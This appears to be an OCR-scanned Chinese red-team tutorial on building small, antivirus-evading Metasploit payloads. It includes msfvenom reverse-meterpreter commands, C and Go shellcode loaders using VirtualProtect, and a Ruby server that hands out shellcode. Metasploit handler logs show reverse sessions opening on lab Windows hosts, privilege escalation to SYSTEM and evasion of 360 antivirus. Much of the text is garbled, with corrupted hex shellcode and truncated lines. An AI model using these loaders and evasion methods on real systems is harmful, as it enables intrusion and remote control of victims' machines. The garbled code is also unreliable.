Ж "NXTANX7dNXSf NXC8NX64Nx82Nxea NX 70NX85NX17NX15NX20NXe9NxbONx 7d" 
2 "\xce\xd4\xf7\x21\x31\x33\x84\x26\xcd\xc1\xa3\x8e\xa5\x39\xF4" 
d "\xX2€\xX35\x50\xf4\x7e\x5d\ xaf\xdb\x71\xad\x50\xf6\xd9\xa5\xdb" 
"\x97\xa8\x54\xdb\xbd\x6d\xc8\xde\x32\xb6\xfb\xa7\x3b\x49\xfio" 
_ "\x57\x52\x2e\xfd\x57\x5a\x50\xc2\x81\x63\x26\x05\x12\xd0\x39" 
~"\x30\x37\x71\xd0\x3a\x6b\x81\xF1"; 
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"rootQJohn:/tmp& msfvenom -p windows/meterpreter/reverse. tcp LHOST=192.168.1.5 LF 
] No platform was selected, choosing Msf::Module::Platform::Windows from the E 


tempting to encode payload with 1 iterations of x86/shikata ga nai 


à ü renom -p windo 

[-] No p f L elected. ch 

[-] No arch selected, selectinq 

Found 11 compatible encoders 
pting to encode pay 


kata ga nai : 


of c file 
ar buf[] 








|] ғас) [тата >] тише). | 


日 常规 А 
Windows SDK 版 本 1.0 
输出 目录 不 同 选 
RAAR “不同 选 项 
目标 文件 名 $ (ProjectName) 
目标 文件 扩展 名 exe 












SPAT SSR E =, ж. cd£;*. cache; ж. ob]; *. obj. enc; *. ilk;*. 1pdb;*. 1051; 
生成 日 志文 件 六 i Flinthir ТТАР ој ест але) loz 
Фата | Visual Studio 2017 - Yindows IP (у141 хр) 


ЕНТЕНЕНЫ 2 25 
E NES fü 


re О st тө! hr ` 
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小 重新 生成 
cH 异常 






















Ga) 
(ZEMHsc) 







#0 D3 Hm 13 


多 线程 (ат) 
默认 设置 


是 (/Gy) 


未 设置 
精度 (Ep precise) 





(MT, /тта, /MD, /MD3) | 


include <windows.h> 
main(void) 


char *shellcode = (char*)"Micropoor shellcode"; 


_ DWORD Micropoor shellcode; 
BOOL ret - VirtualProtect(shellcode, strlen(shellcode), 
PAGE EXECUTE READWRITE, &Micropoor shellcode); 
if (!ret) ( 
y return EXIT_FAILURE; 

} 
— ((void(*)(void))shellcode)(); 
return EXIT SUCCESS; 


E  «езһпейсоде рауоасЖ/ IF: 757763 5 


i 
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Micropoor small payload. exe | * 


文件 类 型 : ”应 用 程序 ( exe) 


d Micropoor small payload. exe 
位 置 : C:Wesers\John\Desktop\Mi cropoor_small_pay 
大 小 : 74.0 KB (75,776 字 节 ) 


占用 空间 : 76.0 KB (17,824 字 节 ) 


优化 : 在 优化 的 过 程 中 ， 需 要 确保 


` 性 能 
. 大 小 
。 可 塑性 
. ЖЕ 


非 算 法 ， 故 优化 /01 











£1 
ш ДЕЕ M EUREN 0)... 
Me ee 91) xl 
AESI E 默认 值 
ГЕ: ШЕШ ЕН 是 Ugo) 
优选 太 小 或 速度 TR 
省 路 帧 指针 < 不同 选项 >》 
启用 针 程 安全 优化 = 
全 程序 优化 E. QGL) 
无 使 用 预 编译 头 ， 故 否 
ЕС): шш--- ч ij Fae): un 所 有 平台 7|) REER 
‘ ee TU» 预 编译 头 жен 
i a + ЖЕУ stdafx. h 
тү gF RAEI $ (IntDir)$ (TargetNane). poh 
a Сус ++ 





жива, 故 否 
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ELIE ELIOT 


2” Ф): ке М RAE: 






ENARE IE $ (DutDir)$ (TargetName). pdb 
生成 完整 的 程序 数据 库 文件 
去 除 私有 符号 

生成 映射 文件 

映射 文件 名 

映射 导出 

本 调试 程 序 集 


ІН 


ІН 


v por ugue Р a pea 


v] жес): [нета >] 。 配置 管理 器 0) | 





ехес і сгороог shellcode "А 
无 入 口 点 = 

设置 校 验 和 a 

Bit 

随机 基 址 是 (/DYNAMICBASE) 

固定 基 址 

数据 执行 保护 ШЕР) 是 (/NXCOMPAT) 

关闭 程序 集 生 成 a 


HHS ROSA DLL 
HU ESDRIDSRR) DLL 


导入 库 

合并 节 

目标 计算 机 《< 不同 选项 
配置 文件 & 

CLR 闭 程 特性 


1 置 : С: AUsers*TohnMlesktopMlicropoor small рау 
IX 4.50 KB (4,608 33%) 
- BAZA: 8.00 KB (8,192 $44) 


第 一 次 靶 机 测试 : 分 别 测试 Windows 2003, Windws 7, reverse OK, 


I nents УМ; 
Documents and Settings Administrator NS [BT »Micropoor. small payload.exe 
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msf exploit(multi/handler) » exploit ` v p s 


[*] Started reverse TCP handler on 192.168.1.5:53 
[*] Sending stage (179779 bytes) to 192.168.1.119 
[*] Meterpreter session 4 opened (192.168.1.5:53 -> 192.168.1.119:3887) at 2019- 


meterpreter > getuid 
Server username: WIN03X64NAdministrator 
meterpreter » 


第 二 次 优化 payload 


载 入 PEID 


д " 
me 

ADS: 00001000 EP FZ; text 

ЧАЧЕ: 00000400 HIP. 55, 8B, FC, 51 
连接 器 版 本 : 14. 12 子 系统 : Чіг32 console [>] 


PEiDDSCAN: yoda’ s Protector 71.02 ( dll,. ocx) -> Ashkbiz Danehk [>] 


(Ехннвш) EEEO) | 扩展 信息 | | f | 
1 总 在 最 前 б) | 选项 @) | | 关于 @) | 退出 


OV. RB ух R 大 小 ”标志 
00001000 oa0oa17c 00000200 | 60000020 
00002000 00000456 00000600 | 40000040 
00003000 00000324 00000200 | сооооо40 
00004000 000001Е0 ооооо200 | 40000040 
00005000 00000064 00000200 | 42000040 





合并 data to text, rdata to text 在 次 生成 。 


输出 
显示 输出 来 源 @) 生成 М жога 


та ыз UPL амаа рауағам. чу . пад LAATEJE. |I чаза қалын то; EA TTS j^ IET) IH) SEAR момыным) 
LMMieropoor_small payload. vexpro) -> Ci\sers\Tohn\Desktop\Micropoor_small payload\Wicropoor_small payloadXReleaseW 
DEXBCERSIRE] “Micropoor_small_payload. vexproj” 的 操作 。 

2222522225 全 部 重新 生成 : 成 功 1 个 ， 失败 0 15 Wo 0 A ========== 


Section 变 化 如 下 : 
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ABA: 00001364 mu T 5) 





ТІНІН: 00000764 BTT 55,8В,ЕС,51 [>] 
连接 器 版 本 : 14.12 子 系统 : Win32 console | > | 











m 


PEiDDSCAN: yoda’ s Protector v1.02 (. dll, ocx) -> Ashkbiz Danehk | > | 
(Елінні! | [sem D) [тава | | mF | 
总 在 最前 С) [ema | |ғы "ЕН | 
























ix 





位 置 : C:\Wsers\JohniDesktop\Mi cropoor_small_pay 
大 小 : 4.00 KB (4,096 字 节 ) 
占用 空间 4.00 KB (4096 字 节 ) 


第 二 次 靶 机 测试 : 分 别 测试 Windows 2003, Windws 7, reverse OK; 
Б ` 命令 提示 符 - Шісгороог small p 


C:\Documents апа СесбіпесчЯдтіпісеғабок“ | ШЭМісғороок snall payload.exe 


C:\Documents апа Settings Administrator k M Micropoor_small_payload.exe 


msf exploit(multi/handler) > exploit 


[*] Started reverse TCP handler on 192.168.1.5:53 
[*] Sending stage (179779 bytes) to 192.168.1.119 





[*] Meterpreter session 9 opened (192.168.1.5:53 -> 192.168.1.119:3891) at 2019- 


meterpreter > getuid 

Server username: WIN03X64NAdministrator 
meterpreter » getpid 

Current pid: 1232 


1610 


第 三 次 优化 payload 


xh xr ғғ ға, LA `. 


88888E68: 
88888E78: 
88888E88: 
B08000E98: 
80800808Eñ0: 
88888EB8: 
88880ЕС80: 
80888ED8: 
8888BEE В: 
88888EF 8: 
88888F 88: 
88888F 18: 
88888F28: 
888088F 36: 
88880F 48: 
99888F58: 
88888F68: 
88888F 76: 
88088F88: 
88880F98: 
88888F68: 
88088FB8: 
88888FC 8: 
88888FD8: 
88888FE 8: 
0868860FF8: 


fr: 
Ж: 
占用 空间 : 


vu w vv x 


1с 38 66 88 
68 88 00 88 
вв 58 80 8G 
ов вв 88 88 
08 88 ве 88 
88 88 80 68 
88 88 вв 86 
66 88 66 88 


аға, Ww 


ч 


we 


08 66 08 00 


88 
88 
88 
88 
80 
88 


88 
88 
88 
88 
88 


88 


C:\Documents and Settings \Administrator \§ 
3.09 KB (3,174 FP) 
4.00 KB (4,096 FP) 
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е: 分 别 测 试 Windows 2003, Windws 7, reverse ОК, 并 且 最 终 编译 运行 库 依 然 
ж: IMT 


基本 运行 时 检查 SHAB 
运行 库 SHE (ит) 
结构 成 员 对 这 默认 设置 


апа Settings \Administrator\  >Мїсгороок_<та11_рау1оай.ехе 


Documents and Settings Administrator УФ ЭМіскороок 5па11 рауіоай.ехе 


Documents апа SettingsSñdministratorsSSE[H]>Micropoor small payload.exe 





msf exploit(multi/handler) > exploit 


[*] Started reverse TCP handler on 192.168.1.5:53 
E^] Sending stage (179779 bytes) to 192.168.1.119 
І"І Meterpreter session 11 opened (192.168.1.5:53 -> 192.168.1.119:3894) at 201€ 


meterpreter » getuid 

Server username: WINO3X64\Administrator 

meterpreter » getpid 

Current pid: 3152 

meterpreter » getsystem 

...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). 
meterpreter » getuid 

Server username: NT AUTHORITYNSYSTEM 


"sf exploit(multi: handler) > exploit 
Sending 779 by (2119 
*] Meterpreter s on 0 ( 68.1.5:53 -» 192.168.1.119:3894) at 2019-01-27 14:56: 


> getuid 
e: WINQ3X64\Administratar 


erpreter > getuid 
S NT. AUTHORITY*SSYSTEM 





第 四 次 优化 payload 


文中 需要 用 到 peditor 1.7，PEiD 0.95, C32Asm v2.0.1.0 
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基于 实战 中 的 small payload 应 用 一 “第 二 季 


攻击 机 : 192 ,168.1.4 Debian 
靶 机 : 192.168.1.2 Windows 2008 


目标 机 安装 : 360 卫 士 +360 杀 毒 
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b\wwwroot\> tasklist 


PID 235% 








explorer.exe 

vmtoolsd.exe 
ustedInstaller.exe 

. 360Tray.exe 

| 860sd.exe 
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Ж USC Is POURSUIT US TOR IOS IS ТАМЫ АУЛАР НК ЛЕС ӘРЕ S: A ж. жж 


ZhuDongFangYu.exe 
360rp.exe 
SoftMgrLite.exe 
w3wp.exe 
svchost.exe 


notepad.exe 


cmd.exe 
conhost.exe 


Oo @ F @ @ hF F o 
ы ЖЖ ҚЖА АЖЖ 


tasklist.exe 





с:\> dir 


жәнс 中 的 卷 没 有 标签。 


卷 的 序列 号 是 C6F8-9BAB 


c:N 的 目录 


2017/12/13 
2009/07/14 
2017/12/13 
2019/01/23 
2019/01/23 
2017/12/13 


03: 
21: 
03: 
14: 
14: 


03 


28 «DIR» 
20 «DIR» 
28 <DIR> 
09 <DIR> 
15 <DIR> 
125 <DIR> 
о “Ху 


inetpub 

PerfLogs 

Program Files 
Program Files (x86) 
Users 


Windows 
0 = 
6 个 目录 21,387,132,928 可 用 字 节 





目标 机 位 x64 位 Windows 2008 


C:\> ver 


Microsoft Windows [版 本 6.1.7690] 





配置 payload 
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rootQJohn:/var/www/html& cat ./Micropoor rev.rb 
require 'socket' 
if ARGV.empty? 
puts "Usage:" 
puts "Micropoor.rb port" 
exit 
end 


PORT - ARGV.first.to i 


def handle connection(client) 
puts “Payload is on-line #{client}" 


client.write('"4831c94881e9cOffffff488dO5efffffff48bb32667fcceeadb9f748315827 
client.close 
end 


Socket - TCPServer.new('0.0.0.0', PORT) 
puts "Listening on #{PORT}. " 


while client - socket.accept 
Thread.new { handle connection(client)) 


end 


root@John:/var/www/html# ruby ./Micropoor_rev.rb 8080 
Listening on 8080. 
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html# cat ІМісгаровг rev.rb 
nimis а 


m 
anr.rb port 


lient} 


nic 
(CL 

š 

1 


on-line #{clientt" 


4650058 8315 


ket.accept 
м { handle_connection{client}} 


var /htmls ruby ./Micropoor геу. гЬ 8080 





-EffMicropoor shellcode x64.exe 


LJ C: inetpub wweroot! 





192. 1€ 
= < с: aspnet_client 0 Directory 
= LJ inetpub 11 aspx 71 
= lisstart htm БӨЗ 


J aspnet client 





- C2 $Recycle. Bin 
LJ 5-1-5-21-3190331051-222194265-234 
LJ SBOSANDBOX 


— Documents and Settings 


noe 


配置 msf: 





welcome.png 2017 


= 
9o 
= 
co 


msf exploit(multi/handler) » use exploit/multi/handler кт 

msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse tcp 
payload -» windows/x64/meterpreter/reverse tcp 

msf exploit(multi/handler) » show options 


Module options (exploit/multi/handler): 


Name Current Setting Required Description 


Payload options (windows/x64/meterpreter/reverse tcp): 


Name Current Setting Required Description 

EXITFUNC process yes Exit technique (Accepted: '', seh, three 
LHOST 192.168.1.4 yes The listen address (an interface may be 
LPORT 53 yes The listen port 


Exploit target: 
Id Мате 


0  Wildcard Target 


msf exploit(multi/handler) » exploit 


[*] Started reverse TCP handler on 192.168.1.4:53 


” 
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e exploit/multi/handler 
la 64/neterpreter/reverse. tcp 


ons (windo /meterpreter/reverse'tcp) 


Current Setting Required Description 


Exit technique (Accepted: '', seh, thread, process, none) 
The listen address (an interface may be specified) 
The listen port 


target 
Id Name 


Wildcard Target 


> exploit 


Started reverse TCP handler оп 192.168.1.4:53 
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msf exploit(multi/handler) » exploit ‹ * yo 


[*] Started reverse TCP handler on 192.168.1.4:53 
[*] Sending stage (206403 bytes) to 192.168.1.2 
[*] Meterpreter session 6 opened (192.168.1.4:53 -> 192.168.1.2:49744) at 2019-6 


meterpreter » getuid 
Server username: IIS APPPOOL\DefaultAppPool 
meterpreter » sysinfo 


Computer : WIN-S5BMI9HGCA2S 
05 : Windows 2008 R2 (Build 7600). 
Architecture 35x64 


System Language : zh CN 


Domain : WORKGROUP 
Logged On Users : 1 
Meterpreter : x64/windows 


meterpreter > ipconfig 


Interface 1 


Name : Software Loopback Interface 1 
Hardware MAC : 00:00:00:00:00:00 
MTU : 4294967295 


IPv4 Address : 127.0.0.1 

IPv4 Netmask : 255.0.0.0 

IPv6 Address : ::1 

IPv6 Netmask : ffff:ffff:fTfTf:TfTf:TTfT:fTTTTf:TfTT:TTfT 


Interface 11 


Name : Intel(R) PRO/1000 MT Network Connection 
Hardware MAC : 00:0c:29:bc:0d:5c 
MTU : 1500 


IPv4 Address : 192.168.1.2 

ІРу4 Netmask : 255.255,255.0 

IPv6 Address : Ғе80::5582:70с8:а5а8:8223 
pve Netmask + ТГТГЕТТГТІГЕТІ СЕСЕ: 
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> exploit 


tarted reverse TCP handler on 192.168.1.4:53 


Sending stage ( 
Meterpreter session 6 opened (192.168. 


tecture 


3 bytes) to 192.168. 
19 


IIS APPPOOL*DefaultAppPool 
sinfo 
`: WIN-SBMISHGC42 
Windows 2008 R2 (Build 7600) 
x64 


tem Language : zh_CN 


eter 


er 


rdware MAC 


4 Address 
1 Netmask 
Address 
Netmask 


rdware MAC 


"6 Address 
6 Netmask 


meterpreter > 


WORKGROUP 
1 


x64 /vindows 


> ipconfig 


Software Loopback Interface 1 
00: 00: 00: 00; 00: 00 
4294967295 
127.0.0.1 
255.0.0.0 
1 
РРР: РРР: ffff: fttf: TTTT fff: FF TT: TT TT 


Intel(R} РВ0/1000 MT Network Connection 
00:0с:29:рс:04:5с 

1500 

192.168.1.2 

255,255.255.0 

j 115582: 70c8: aSa8 
ffff:ffff:ffff:ffff:: 


Microsoft ISATAP Adapter 


00:60:60: 06:00:00 


: :Sefe:c0a8:102 
ffff:ffff:ffff:ffff:ffff: ВЕРЕ ЕЕЕ 


1.2 
4:53 -» 192.168.1.2:49744) at 2019-01-23 


{ 


01: 


29:00 


- 0500 





meterpreter » ps . А » 


Process List 


PID PPID 
0 0 

4 0 
236 4 
296 468 
324 316 
332 468 
364 356 
372 316 
408 356 
468 372 
476 372 
484 372 
548 468 
576 468 
584 468 
632 468 
676 468 
764 468 
800 468 
848 468 
864 2684 
900 468 
940 468 
1052 468 
1076 468 
1144 468 
1216 468 
1300 468 
1332 468 
1368 468 
1440 576 
1476 468 
1712 2636 
1768 576 
1848 468 
1940 468 
2456 468 
2612 468 
2636 1096 
2684 1096 
2788 3408 


Name Arch Session User 


[System Process] 
System 

smss.exe 
mscorsvw.exe 
csrss.exe 
svchost.exe 
csrss.exe 
wininit.exe 
winlogon.exe 
services.exe 
lsass.exe 
lsm.exe 
spoolsv.exe 
svchost.exe 
mscorsvw.exe 
vmacthlp.exe 
svchost.exe 
svchost.exe 
svchost.exe 
svchost.exe 
SoftMgrLite 
svchost.exe 
svchost.exe 


«exe 


svchost.exe 
svchost.exe 
svchost.exe 
VGAuthService.exe 
vmtoolsd.exe 
ManagementAgentHost.exe 
svchost.exe 
WmiPrvSE.exe 
sppsvc.exe 
360rp.exe 
WmiPrvSE.exe 
dllhost.exe 
msdtc.exe 
ZhuDongFangYu.exe 
taskhost.exe 
360sd.exe 
360Tray.exe 


Micropoor shellcode x64.exe x64 0 
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IIS APPPOOL\DefaultAppF 


2868 900 dwm.exe 


2896 


3008 2896 
3196 468 svchost.exe 


3300 1368 w3wp.exe 0 IIS APPPOOL\DefaultAppF 
3408 3300 cmd.exe 0 IIS APPPOOLNDefaultAppF 


3712 2896 notepad.exe 
4092 324 conhost.exe КОО ороо DefaultAgpr 


2852 ехр1огег.ехе 
vmtoolsd.exe 


meterpreter 


xe 
хе 
ке 


D Dco 


x 


VGAuthService.exe 
vmtoolsd. exe 
ManagementAgentHost.exe 
svchost.exe 


| 
3 | 
8 АТС  КЕТІсоде x64. exe x64 IIS APPPOOLNDefault&ppPool C:\inetpub\wwwroot\Micropoor_she 
dwm ,exe 
explorer.exe 
ymtoolsd. exe 
sychost.exe 
w3wp ехе x6 5 APPPOOLNDefaultAppPool c:\windows\system32\inetsrv\ 
cmd.exe 6 IS APPPOOL\DefaultAppPool C:\Windows\system32\cmd, exe 
notepad. exe 





Windows 


IP 


769981 
2089 Microsoft Corporation 


ipconfiq 


Ғе8Й::5582:7Йс8:а5а8:8223У11 
192.158.1.2 


(7864BB5C-F998-44BC-f8183-A88392CDC1DB? : 
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EAN 























o 内 存 加 载 shellcode 第 三 季 | 


RTEA mst 生成 一 个 shellcode 


ot@kali:~ msfvenom -p w I с CMDzcalc.exe -f с 

| No platform was selected, choosing Msf::Module::Platform::Windows from the р 
No arch selected, selecting arch: x64 from the payload 

ncoder or badchars specified, outputting raw payload 

oad size: 276 bytes 

al size of c file: 1185 bytes 

gned char buf[] = 

Nx C\X48\x83\xe4\xfO\xe8\xcO\xOO\x00 
IBIAX56 X48NX31Nxd2Nx65NX48NXx8bNXx52 ONXABNXB8DNX52NX18Nx48" 
BSbNx52Nx20Nx48Nx8DNx72NX80Nx48NxOf NXxb7Nx4aVx4aNXxAd Nx 31Nxc9" 
1BXx31 VxcONxac x30 Nx61Nx 706 NX02NX26 NX20N x A1 Nxc1Nxc9NXxQdNx41" 
B1XxciWxe2 VxedVx52Nx41Vx51NX48XX8bNX52NX20NX8bNX42N X8 X48" 
T VXdOVx8b Vx8OVx88N X00 VX00N X00 NX48NXBSNXCONX7ANX67NXABNXO1" 
OXX590NX8bNX48NX18NXx44NX8bNXx40NX20NX49NxXO1NxdONxe3Xx56Nx48" 
PNXC9 X41 NX8b X34 NX88NX48NX01NXd6 x4 d X31 NXC9NX4BNX81NX CO" 
aC x41 xci Nxc9 xod Vx41Nx01Nxc1N x38 xeO0Nx 75x F1 NXx46NX63NX4c" 
ZXX08VX45N X39 Vxd1Nx75Nxd8NXx58 x44 NxX8bNx40NX24N x A9 N X01 xdo" 
BS XXA1NXBbNXOCNXABNX44NX8DNXAQNX16NX49 NXO1NXdO NX A1NXBbNXx04" 
88\х48\хО01\ха0\х41\х58\х41\х58\х5Бе\х59\хБа\х41\х58\х41\х59" 
А1\х5а\х48\х8З\хес\х20\х41\х52\хЁЁ\хе®\х58\х41\х59\х5а\х\х48" 
IBbNx12Nxe9Nx57 хх FAXFAX FAxSdVx48NxbaNXx01NX00N X00 x00 x00" 
BONXOOVXx0OONXx48Nx8d Nx8dNx01Nx01Nx00NXx00Nx41NxbaNXx31NX8bNx6f " 
B7ZNxffNxd5NxbbNxfONxb5Nxa2NX56Nx41NxbaNxa6Nx95NxbdNx9dNxf f" 
O5\x48\x83\xc4\x28\x3c\xO6\x7e\xOa\ x8O\xfb\xeO\x75\xO5\xbb" 
BOUE 7NX13NX72Nx6f \xGa\ xOO\xS9\ x41 \x89\xda\xff\ xd5\x63\x61\x6e" 
AKG3\x2e\x65\x78\x65\x00"; 


NX41NX51NX41NX50NX52" 






хо 


面 的 一 篇 文章 (关于 msf 反 弹 后 门 的 免 杀 Tips) 中 我 已 经 提 到 了 Golang 加 载 shellcode， 当 时 
的 是 内 联 c 语言 ， 代 码 我 也 直接 贴 出 来 
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package main кеті Мк” Ra v Ф got 


void call{char *code) 


int (*ret үү = тілесе) )code; 


3 
i 
ky 
/ 


import "C" 
import "unsafe" 


func main() { 

Duf ru 

buf += “\xdd\xc6\xd9\x74\xK24\xf AXX5fAX83Nxc9Nxb8X3xb3Nx5eNx2c" 
buf += "Nxc9Xxb1Nx97Nx31Nx47NX1aNx03Nx47Nx1aXx83N xc 7NX04Nxe2" 
buf += "AxA6NXx84NxfdXx72Nxee Xx0eXxb5x965Nx37Nx04Nx6dNx63N x9 f" 
buf += "XxccXxaANx3aNx8e Xx8c Nx f 7Ax39x81NxcaNxe4 Nx A2NXx f f Axce" 
buf += "Xxa3Nxa2NxdbNx06NxcONx3f Nxaf NxA1Nx73NxbaNxf7Nx20Nx13" 
buf += "\x9s\x8ce\xFf\xfa\x@alxda\ x6e\xf2\xbd\xo3\x81\x07\xco" 
buf += "Ax1bNXx37NxebNxa2NXagNx32Nx71Nxaf AXxe9Xx20N xdi NxaaNx9e" 
buf += "NxbdNx82Nxf3NXx81Nx1f XxabNxbf Nxc4áNxd9Xx6cNx75NX37Nx3a" 
buf += "\x53\x78\x90\x79\xaf\x83\xib\xb3\x15\x89\xe5\x45\x5c” 
buf += “\x26\xOF\xOd\x16\x52\«KFI\xBa\x7e\x8b\xc4\xSO\x8e\xGa" 
buf += "Xx38Nx2fNX2bNX498NX73NXObNXfONXx51XN x5 fVxcaNxbfNx9ANx47" 
buf += "\x88\x36\xXe5\xB88\x88\xb3\xfc\xad0\x52\xfe\x92\x81\x8d" 
buf += "Ax89Xxf2NX68aNXCC NX 7f NX9aNxeg Nx1aVk30 Nx 73NXXa3NX63Nx42" 
buf += "Ax10Xxe9WxcfNx62Nxe4Nx06Nx52NXxe1Nx8dNx88NxfeXx52Nxc4" 
buf += “\xc3\xed\x7a\xGe\x66\x5f x8 \K2c\ xef XxfaVxbdNx8c Nx 79" 
buf += "Xx6cXxOlXxe3'u5cNxdeVxc4Nx8aNx4c NX? dX x34Nx32Nxb5 Vx 23" 
buf += "Xx56Xx6cNx52 NX 3f Vx15Vx26Nx6aNXxf8Nx6bNx81Nx20Nx23Vx8d" 
buf += "XAx4A1Xx6eNX24 Nx 30 Nxc6NxcbNxbaNx26NxdANXx3bNx37Nxd3Nxc6" 
buf += "XxaBXx5aNx18Nx8f Nx1eNx27NxcaNxcbNxda Nx 7£Ax74Nx62Nxb2" 
buf += "Xx62Nxa6Nxb1NxfcNx64Nx53Nx3aNxa7 NxadNx21NXx 3d Nx 79Nx 98" 
buf += "\xO6\x74\x2a\xa2\xe7\xOd\x68\K16\xa3\x96\xe5\xad\x32" 
buf += "Xx10Xxa3NxOf Nx49Nxc3Nx69NXxa7Vx5bNx61NxtaVxf 8Nx1dVx9e" 
buf += "\x9b\x3a\xOO\xfc\xK18\xc3\x42\xla\xd6\ x44\x5d\xferxc5" 
buf += "\xb6\x68\xd2\xad\x24\xda\x74\xa7\xf3\x66\x9a\x42\x7a” 
buf += "\x50\xfO\xOb\x47\xbe\xad\x6c\xte\xca\xbe\x90\xca\xce3" 
buf += "Xx8eXx5bNxdeNx66Nxe2NxXb3NX20NX6fT Nx 38Nx17Nxc1NxacNxfb" 
buf += "Xxd3Nx2fNXx9153xa7Nxf fNxG65Xxd7XxdONXx25NxAcNxdAdNxb3Nx35" 
buf += "Xx38Nxa1Xx82Nxb8NXx23NXx42NX89NXa5XAx95Nx8e NxcANx35Nxca" 
buf += "Xx9g2XxfeXxdeNx62Nx70Nxd6Nx7aNXx 7f NXFdNxfbNxfONXx24Nxbd" 
buf += "Xx5dXx6dNx3dNx13NxbcNx1dNx25Xx54Nx9d Nx0e Nx68Nxc8Nx9a " 
buf += "Xx10Xx87NxXf ONXCO VXxac Nx 37NX57NX84XxX23Xx5f NxBaNxcONxab" 
buf += "Xx52WXx6eXxaeNx79Nxa2NxdbNxf f\xdB\xX44\x28\x8b\xd3\x9d" 
buf += "Xx68NX3Cc NX58NXf 2AxfeNx0c Nx8aNx38 xd f NXbSNX80NX9b Nx 70" 
buf += "Nx2bXx4eNxelNxfaNx0bxXxfexxf5NXxc3NxiaNx0dXx83%VúMDONx69" 
buf += "Nxd@Nx68NxfbXxe0XxaeXxbdNx56Nx52%x17NX9aNxf8Nx8fNxco" 
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(14\х8с\хбб\хЁ7\хбе\х87\хЇа\х54\хЇ4\х0©4\х4ах\х5а\хс8" 
9Xx57NxOe xb f 7a Nx 76NX9b Nx feNxbSNXSfNXS1612 Vxec 
afNx18Nx9e NX 3f x fONxX09NX79NxX86NXb3Nx08Nx29NX50 Vxf d" 
хсз\х4б\хтЧ\х24\х51\х5һ\ха®\х81\х19\х6т\хс2\х2с\х17" 
xabXxa3 Nxb7Nxd9Nx6f Nx82NXxd9Nx37NXS8f Nx38Nx01 Nxd8 Vx f d" 
NxfdXx11Nx22Nx61*xdONX92NXx45NXx37NXAf Nx6cNxAe Nx91Nx3b" 
Xx42NX07 NXC5NX77NxdC NX82Nxd6Nxc7Nx9dNx7bNx62NxbaNxic" 
Nx62Xx3c NxdeVxadNx96Nx03Nx55XNxdeXx9dNx52Xx5eNxSdNx9c" 
IINx73XxQeNxc3 Vx4c NxaeNx7d Sd ex 76 Nx64Nxaf XxbbNxce Vae" 
IXAx9aXxoeNxbiNx51Nxc4Nx2d Sx 1bNx6bNxb7Nx7cNxd9Nx4bXNxc 3" 
EU"XxScVx43Nxd6Nx1bNx2aNx4Af Nx5eNXxoaNx9aNxd5Nx4dVx45Nx64" 
DXX6CXXOCNXCBNXf5Nx89Nxd7NXx45NXx86NX85NXx99Nx8d X34 x65" 
EUNX21Nxd3NX3bNx35NxceNx22Nx290NxOc Nx deXNxcaNx48Nx 3f Xx55" 
"XXx5dNxibNxdaNx35Xxc1Nx2d" 

Maur Call site, you can send the shellc: 





Function by converting 
[code := []byte(buf) 
L((*C. char) (unsafe.Pointer(&shellcode[:.]))) 


j 多 解释 ， 就 是 把 传 进来 的 byte 数组 变 成 一 个 函数 指针 ， 然 后 调用 。 
周 用 操作 系统 的 api 来 进行 加 载 
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package main Ë 0. 


import ( 
"golang.org/Xx/sys/windows" 
"unsafe" 


// RunShellcode 执行 一 段 shellcode 
func RunShellcode(sc []byte) { 
// golang 一 般 指针 用 *uintptr 类 型 


// ff 变量 保存 的 是 指向 一 个 函数 的 起 始 地 址 ，&f 是 函数 指针 的 指针 

f += func() {} 

// fStartAddress7jf ЗЕН 

var fStartAddress **uintptr - (**uintptr)(unsafe.Pointer(&f)) 


// MBF RRS SPEAR S it 
var oldfperms uint32 
err :- windows.VirtualProtect(uintptr(unsafe.Pointer(*fStartAddress)), unsaf 
if err t= nil ( 
panic(err) 


// ТЕЖА 5с 
var scAddress *uintptr = (*uintptr)(unsafe.Pointer(&sc)) 
**fStartAddress - *scAddress 


// 改变 sc 变量 (shellcode) 所 在 地 址 的 内 存 页 属性 
var oldshellcodeperms uint32 
err - windows.VirtualProtect(uintptr(*scAddress), uintptr(len(sc)), windows. 
if err != nil ( 
panic(err) 


// 调用 函数 
ҒО 





func main() { | 
buf := "\xfc\x48\x83\xe4\xfO\xe8\xcO\xOO\ xOO\xXOO\X41\x51\x41\x50\x52" 
buf += "Nx51NX56NXx48NX31Nxd2NXx65Nx48NX8bNX52NX60NX48NXBbNXx52NXx18Nx48" 
buf += "\x8b\x52\x20\x48\x8b\x72\ x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xco" 
buf += "\х48\х3З1\хс@\хас\х3с\хб61\х7с\х©02\х2с\х20\х41\хс1\хс9\х@д\х41" 
buf += "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\xX52\xX20\xX8D\X42\x3C\x48" 
buf += "\x01\xdO\x8b\x80\xX88\x00\xO0\xOO\x48\x85\XCO\X74\xX67\xX48\ x01" 
buf += "Nxd@NX50NXX8DNX48NX18NX44NX8DNX40NX20NX49NX01NXd0NXe3NX56Nx48" 
buf += "NxffNxXxc9NX41NX8DNX34NX88NX48NXx01NXd6NX4dNX31NXC9NX48NX31Nxc0" 
buf += "NxacNX41NXC1NXC9NX0dNX41NX01NXC1NxX38NXe0NX75NXf1NX4cNXNxO3Nx4c"' 
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buf += "\x24\x08\X45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 
buf += "\x66\x41\x8b\x0C\x48\x44\x8D\x40\x1C\x49\x01\xdO\xX41\x8b\ x04" 
buf += "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\X41\ x59" 
buf += "\ x41\x5a\x48\x83\xec\x20\x41\x52\xf fF\xeQ\x58\xX41\x59\x5a\x48" 
buf += "\x8b\x12\xe9\x57\ xf f NXf F\XFF\x5d\x48\xba\x01\x00\x00\x00\x00" 
buf += "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\xO0\x41\xba\x31\x8b\x6f" 
buf += "\x87\xff\xd5\xbb\xfO\xb5\xa2\x56\x41\xba\xa6\x95\xbd\ x9d\xf f " 
buf += "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\xOa\x80\xfb\xe0\x75\x05\xbb" 
buf += "\x47\x13\x72\x6f\x6a\xOO\x59\x41\x89\xda\xf f NXxd5NXx63Nx61Nx6c" 
buf += "\x63\x2e\x65\x78\x65\x00" 

shellcode := []byte(buf) 

RunShellcode(shellcode) 


C:\Users\qqq\Desktop\go-shellcode> go build 
C:\Users\qqq\Desktop\go-shellcode> .\go-shellcode.exe 


uman\Desktop\go-shellcode> 
